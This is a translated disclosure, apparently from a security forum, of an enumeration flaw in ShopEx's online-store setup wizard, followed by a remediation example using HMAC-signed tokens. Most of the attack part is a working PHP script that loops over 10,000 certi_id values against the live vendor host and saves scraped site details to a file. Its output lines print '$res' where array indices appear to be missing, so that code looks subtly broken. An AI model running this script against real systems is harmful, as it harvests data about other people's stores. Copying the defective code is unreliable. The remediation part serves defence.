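ShopEx interface flaw allows enumeration of all user websites
Brief description: A flaw in a ShopEx interface makes it possible to enumerate all websites.
Details:
The problem is in the ShopEx online store setup wizard page:
http://guide.ecos.shopex.cn/step2.php?refer=eyJjZXJ0aV9pZCI6MTA1MSwiY2FsbGJhY2tfdXJsIjoiaHR0cDpcL1wvd3d3LmVrYWlkaWFuLmNvbVwvIn0=
The refer parameter base64-decodes to {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
By modifying certi_id we can enumerate every website that uses the ShopEx software.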
<?php
for ($i=1; $i < 10000; $i++) { // enumerate
    ShowshopExD($i);
}
function ShowshopExD($cid) {
    $url='http://guide.ecos.shopex.cn/step2.php';
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
    $result = curl_exec($ch);
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");
    if(strpos($result,$refer))
    {
        $fp = fopen("c:/shopEx.txt",'ab'); // save to file
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
        foreach ($value as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
            echo $res.':'.$res."\r\n";
            $col =$res.':'.$res."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
Proof of vulnerability:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
Change refer to use a different encryption method.
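Base64 is an encoding rather than encryption, so any client can rewrite certi_id inside refer. The following is an added example (not ShopEx code and not from the original post) of one way to make refer tamper-evident with an HMAC; the function names, the exp field and the REFER_KEY constant are assumptions made for illustration.

```php
<?php
// Added example: HMAC-authenticated refer token. All names here are hypothetical.
// REFER_KEY is a constructed demo value; load the real key from server-side secret storage.
const REFER_KEY = 'constructed-demo-key';

function issue_refer(int $certiId, string $callbackUrl, int $ttl = 900): string {
    $payload = base64_encode(json_encode([
        'certi_id'     => $certiId,
        'callback_url' => $callbackUrl,
        'exp'          => time() + $ttl,   // short lifetime limits replay
    ]));
    // The MAC covers the exact bytes handed to the client.
    // rawurlencode() the result before placing it in a query string.
    return $payload . '.' . hash_hmac('sha256', $payload, REFER_KEY);
}

function verify_refer(string $token): ?array {
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;                       // legacy unsigned refer values land here
    }
    [$payload, $mac] = $parts;
    $expected = hash_hmac('sha256', $payload, REFER_KEY);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;
    }
    $json = base64_decode($payload, true);
    $data = $json === false ? null : json_decode($json, true);
    if (!is_array($data) || !isset($data['certi_id'], $data['exp'])) {
        return null;
    }
    return $data['exp'] >= time() ? $data : null;
}

// Case 1: token issued by the server for certi_id 1051.
$token = issue_refer(1051, 'http://www.a.com/');
var_dump(verify_refer($token));

// Case 2: client swaps in a payload with certi_id 1052 and reuses the old MAC.
[, $mac] = explode('.', $token);
$forgedPayload = base64_encode(json_encode(
    ['certi_id' => 1052, 'callback_url' => 'http://www.a.com/', 'exp' => time() + 900]
));
var_dump(verify_refer($forgedPayload . '.' . $mac));

// Case 3: the original unsigned format, plain base64 of the JSON.
var_dump(verify_refer(base64_encode('{"certi_id":1052,"callback_url":"http:\/\/www.a.com\/"}')));
```

Integrity protection only stops tampering with an issued token; the wizard page should still check that the certi_id in a verified token belongs to the authenticated caller before returning any site details.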